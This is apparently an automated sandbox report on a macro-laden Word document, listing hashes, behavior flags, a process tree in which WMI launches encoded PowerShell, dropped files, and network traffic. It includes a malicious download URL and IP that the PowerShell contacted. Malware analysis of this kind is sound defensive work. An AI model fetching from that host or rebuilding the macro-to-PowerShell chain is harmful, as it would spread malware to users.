File name: 6a2b3ba62ebad22dd23cd14b6d42d7efJaffaCakes118
Full analysis: https://app.any.run/tasks/8b9eef2f-d3a6-4834-8a2a-23199bb90d28
Verdict: Malicious activity
Analysis date: May 23, 2024, 15:47:27
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags: generated-doc, macros, macros-on-open
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Sed., Author: Camille Paul, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Sep 15 11:47:00 2020, Last Saved Time/Date: Tue Sep 15 11:47:00 2020, Number of Pages: 2, Number of Words: 5, Number of Characters: 30, Security: 0
MD5: 6A2B3BA62EBAD22DD23CD14B6D42D7EF
SHA1: DB9097BA735D3CED9CD49ABE979511821A954A39
SHA256: FE150DE0643BAF316AD789B237F7BF6BA328D36628712DA3BD32923A677ACB0F
SSDEEP: 1536:pI491Y2wcI491Y2wpiMP4VjYh+/XQihFN1IYmQoCLmr0bgPvkJhR5L1ktKRpPG+7:WiPV9/X3r740bgPCHPktKbPGVa55X

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    • May hide the program window using WMI (SCRIPT)
      • WINWORD.EXE (PID: 6264)
  • SUSPICIOUS
    • Executed via WMI
      • powershell.exe (PID: 6824)
    • Creates an object to access WMI (SCRIPT)
      • WINWORD.EXE (PID: 6264)
    • Reads security settings of Internet Explorer
      • TextInputHost.exe (PID: 7056)
    • Gets or sets the security protocol (POWERSHELL)
      • powershell.exe (PID: 6824)
    • The PowerShell connects to the Internet
      • powershell.exe (PID: 6824)
    • Process requests binary or script from the Internet
      • WINWORD.EXE (PID: 6264)
    • Unusual connection from system programs
      • powershell.exe (PID: 6824)
  • INFO
    • An automatically generated document
      • WINWORD.EXE (PID: 6264)
    • Checks supported languages
      • TextInputHost.exe (PID: 7056)
    • Reads mouse settings
      • WINWORD.EXE (PID: 6264)
    • Reads the computer name
      • TextInputHost.exe (PID: 7056)
    • Uses string split method (POWERSHELL)
      • powershell.exe (PID: 6824)
    • Uses string replace method (POWERSHELL)
      • powershell.exe (PID: 6824)
    • Gets or sets the time when the file was last written to (POWERSHELL)
      • powershell.exe (PID: 6824)
    • Disables trace logs
      • powershell.exe (PID: 6824)
    • Checks proxy server information
      • powershell.exe (PID: 6824)
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Lines: 1
Paragraphs: 1
Pages: 2
Characters: 30
Words: 5
TotalEditTime: -
RevisionNumber: 1
LastPrinted: 0000:00:00 00:00:00
CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
LocaleIndicator: 1033
CodePage: Unicode UTF-16, little endian
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 15
CharCountWithSpaces: 34
Company: -
Security: None
ModifyDate: 2020:09:15 11:47:00
CreateDate: 2020:09:15 11:47:00
Software: Microsoft Office Word
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: Camille Paul
Subject: -
Title: Sed.
Word97: No
System: Windows
DocFlags: Has picture, 1Table, ExtChar
LanguageCode: English (US)
Identification: Word 8.0
No data.
Screenshots: available in the full report.
Total processes: 129
Monitored processes: 5
Malicious processes: 1
Suspicious processes: 1

Behavior graph

Nodes: start, winword.exe, powershell.exe, conhost.exe (no specs), ai.exe (no specs), textinputhost.exe (no specs)

Process information

PID: 6264
CMD: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n C:\Users\admin\Desktop\6a2b3ba62ebad22dd23cd14b6d42d7efJaffaCakes118.doc /o ""
Path: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Word
Version: 16.0.16026.20146
Modules (images):
  • c:\program files\microsoft office\root\office16\winword.exe
  • c:\windows\system32\ntdll.dll
  • c:\windows\system32\kernel32.dll
  • c:\windows\system32\kernelbase.dll
  • c:\windows\system32\apphelp.dll
  • c:\windows\system32\advapi32.dll
  • c:\windows\system32\msvcrt.dll
  • c:\windows\system32\sechost.dll
  • c:\windows\system32\rpcrt4.dll
  • c:\windows\system32\bcrypt.dll

PID: 6824
CMD: powershell -e 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
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: WmiPrvSE.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
  • c:\windows\system32\windowspowershell\v1.0\powershell.exe
  • c:\windows\system32\ntdll.dll
  • c:\windows\system32\kernel32.dll
  • c:\windows\system32\kernelbase.dll
  • c:\windows\system32\msvcrt.dll
  • c:\windows\system32\oleaut32.dll
  • c:\windows\system32\msvcp_win.dll
  • c:\windows\system32\ucrtbase.dll
  • c:\windows\system32\combase.dll
  • c:\windows\system32\rpcrt4.dll

PID: 6832
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Console Window Host
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
  • c:\windows\system32\conhost.exe
  • c:\windows\system32\ntdll.dll
  • c:\windows\system32\kernel32.dll
  • c:\windows\system32\kernelbase.dll
  • c:\windows\system32\msvcp_win.dll
  • c:\windows\system32\ucrtbase.dll
  • c:\windows\system32\shcore.dll
  • c:\windows\system32\msvcrt.dll
  • c:\windows\system32\combase.dll
  • c:\windows\system32\rpcrt4.dll

PID: 6888
CMD: "C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ai.exe" "18DB105C-E8AD-41F6-993B-2C17662A21CD" "218A834A-1024-4318-ABB5-0D532EC7B820" "6264"
Path: C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ai.exe
Parent process: WINWORD.EXE
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Artificial Intelligence (AI) Host for the Microsoft® Windows® Operating System and Platform x64.
Version: 0.12.2.0
Modules (images):
  • c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\ai.exe
  • c:\windows\system32\ntdll.dll
  • c:\windows\system32\kernel32.dll
  • c:\windows\system32\kernelbase.dll
  • c:\windows\system32\apphelp.dll
  • c:\program files\common files\microsoft shared\clicktorun\appvisvsubsystems64.dll
  • c:\windows\system32\advapi32.dll
  • c:\windows\system32\msvcrt.dll
  • c:\windows\system32\sechost.dll
  • c:\program files\common files\microsoft shared\clicktorun\c2r64.dll

PID: 7056
CMD: "C:\WINDOWS\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXjd5de1g66v206tj52m9d0dtpppx4cgpn.mca
Path: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
Parent process: svchost.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Version: 123.26505.0.0
Modules (images):
  • c:\windows\systemapps\microsoftwindows.client.cbs_cw5n1h2txyewy\textinputhost.exe
  • c:\windows\system32\ntdll.dll
  • c:\windows\system32\kernel32.dll
  • c:\windows\system32\kernelbase.dll
  • c:\windows\system32\combase.dll
  • c:\windows\system32\ucrtbase.dll
  • c:\windows\system32\rpcrt4.dll
  • c:\windows\systemapps\microsoftwindows.client.cbs_cw5n1h2txyewy\vcruntime140_app.dll
  • c:\windows\system32\kernel.appcore.dll
  • c:\windows\system32\msvcrt.dll
Total events: 22 538
Read events: 22 220
Write events: 296
Delete events: 22

Modification events

(PID) Process: (6264) WINWORD.EXE
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\ClientTelemetry\Sampling
Operation: write
Name: 0
Value: 017012000000001000B24E9A3E01000000000000000500000000000000

(PID) Process: (6264) WINWORD.EXE
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\5932
Operation: delete value
Name: 0
Value: ซ괐殺ࠆꯞꝅ莼跳⏺䘅헉꾍樁င$梅摝麨…ީ湕湫睯쥮௅賙ᒳ೅肫

(PID) Process: (6264) WINWORD.EXE
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\5932
Operation: delete key
Name: (default)
Value: -

(PID) Process: (6264) WINWORD.EXE
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\6264
Operation: write
Name: 0
Value: 0B0E10CBCC11FB28FA18478D8E50F37EA914D9230046C3C88DDF88A5ABED016A04102400449A7D64B29D01008500A907556E6B6E6F776EC906022222CA0DC2190000C91003783634C511F830D2120B770069006E0077006F00720064002E00650078006500C51620C517808004C91808323231322D44656300

(PID) Process: (6264) WINWORD.EXE
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation: write (six values under the same key)
  • Name: en-US, Value: 2
  • Name: de-de, Value: 2
  • Name: fr-fr, Value: 2
  • Name: es-es, Value: 2
  • Name: it-it, Value: 2
  • Name: ja-jp, Value: 2
Executable files: 0
Suspicious files: 15
Text files: 16
Unknown types: 0

Dropped files

PID: 6264, Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\6a2b3ba62ebad22dd23cd14b6d42d7efJaffaCakes118.doc.LNK
Type: -
MD5: -
SHA256: -

PID: 6264, Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms
Type: binary
MD5: E4A1661C2C886EBB688DEC494532431C
SHA256: B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5

PID: 6264, Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JFZSBAH0CNNCP0VTBMKB.temp
Type: binary
MD5: E4A1661C2C886EBB688DEC494532431C
SHA256: B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5

PID: 6824, Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_zmkrema4.j5b.psm1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 6264, Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres
Type: binary
MD5: F44F7841121B9A676F9F6C31362F586D
SHA256: 60DDC4C5230A69F5E4B59068E1760BCA899DFCD06FB4E9223C3C239DBA7A551A

PID: 6264, Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
Type: abr
MD5: 49E13D4B6F2CB1DAAD24D15F444152E0
SHA256: 31F8B3F5DDD98EAF29FE6ABDF9C5E09D1BA137C6031261ADD25F8F06DD27D45A

PID: 6264, Process: WINWORD.EXE
Filename: C:\Users\admin\Desktop\~$2b3ba62ebad22dd23cd14b6d42d7efJaffaCakes118.doc
Type: abr
MD5: 50F7D950C096D67968A941F0DDC7BFD6
SHA256: 26D5DCF52C345A5807FEBE73CFC9EB37EEC39E3E9367F16E91731A9F361D67CE

PID: 6824, Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_yo4auozl.out.ps1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 6264, Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat
Type: ini
MD5: 629D41CE43F78D3B4080545D7462FB41
SHA256: 5CCC5BF5CA513713AC9ED24A6A9B42A5862AF31621B09D3F56C08C3F3C0D8BD4

PID: 6264, Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd
Type: binary
MD5: 6E11D7D8A24D27CAD9796205CFFA979E
SHA256: 265B488870ED050856884588A589B0228F6F81F60DD37C11E45CD9F3D366401E
HTTP(S) requests: 74
TCP/UDP connections: 82
DNS requests: 30
Threats: 0

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | Other fields as reported (CN / Type / Size / Reputation)
5140 | MoUsoCoreWorker.exe | GET | 200 | 2.16.164.51:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown, unknown
5944 | RUXIMICS.exe | GET | 200 | 2.16.164.51:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown, unknown
4080 | svchost.exe | GET | 200 | 2.16.164.51:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown, unknown
4080 | svchost.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown, unknown
6824 | powershell.exe | GET | - | 49.13.77.253:80 | http://loungegangnam.com/4W/dz/ | unknown, unknown
5140 | MoUsoCoreWorker.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown, unknown
5944 | RUXIMICS.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown, unknown
1608 | svchost.exe | POST | - | 40.126.31.67:443 | https://login.live.com/RST2.srf | unknown
1608 | svchost.exe | POST | - | 20.190.159.4:443 | https://login.live.com/RST2.srf | unknown
1608 | svchost.exe | POST | - | 20.190.159.68:443 | https://login.live.com/RST2.srf | unknown

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
4080 | svchost.exe | 4.231.128.59:443 | - | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
4080 | svchost.exe | 239.255.255.250:1900 | - | - | - | unknown
5944 | RUXIMICS.exe | 4.231.128.59:443 | - | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown
5140 | MoUsoCoreWorker.exe | 4.231.128.59:443 | - | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown
4080 | svchost.exe | 2.16.164.51:80 | crl.microsoft.com | Akamai International B.V. | NL | unknown
5944 | RUXIMICS.exe | 2.16.164.51:80 | crl.microsoft.com | Akamai International B.V. | NL | unknown
5140 | MoUsoCoreWorker.exe | 2.16.164.51:80 | crl.microsoft.com | Akamai International B.V. | NL | unknown
4080 | svchost.exe | 184.30.21.171:80 | www.microsoft.com | AKAMAI-AS | DE | unknown
4680 | SearchApp.exe | 2.23.209.189:443 | www.bing.com | Akamai International B.V. | GB | unknown
1608 | svchost.exe | 40.126.31.67:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted

DNS requests

crl.microsoft.com (reputation: whitelisted)
  • 2.16.164.51
  • 2.16.164.106
  • 2.16.164.18
  • 2.16.164.49
  • 2.16.164.107
  • 2.16.164.32
  • 2.16.164.82
  • 2.16.164.81
  • 2.16.164.73
www.bing.com (reputation: whitelisted)
  • 2.23.209.189
  • 2.23.209.140
  • 2.23.209.149
  • 2.23.209.179
  • 2.23.209.182
  • 2.23.209.130
  • 2.23.209.133
r.bing.com (reputation: whitelisted)
  • 2.23.209.189
  • 2.23.209.149
  • 2.23.209.133
  • 2.23.209.140
  • 2.23.209.130
  • 2.23.209.182
  • 2.23.209.179
www.microsoft.com (reputation: whitelisted)
  • 184.30.21.171
officeclient.microsoft.com (reputation: whitelisted)
  • 52.109.28.46
login.live.com (reputation: whitelisted)
  • 40.126.31.67
  • 20.190.159.71
  • 40.126.31.73
  • 20.190.159.4
  • 20.190.159.73
  • 20.190.159.23
  • 20.190.159.75
  • 40.126.31.69
go.microsoft.com (reputation: whitelisted)
  • 2.19.246.123
loungegangnam.com (reputation: malicious)
  • 49.13.77.253
settings-win.data.microsoft.com (reputation: whitelisted)
  • 20.73.194.208
roaming.officeapps.live.com (reputation: whitelisted)
  • 52.109.89.19

Threats

No threats detected

Process | Message
WINWORD.EXE | WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.
WINWORD.EXE | WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.
WINWORD.EXE | WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.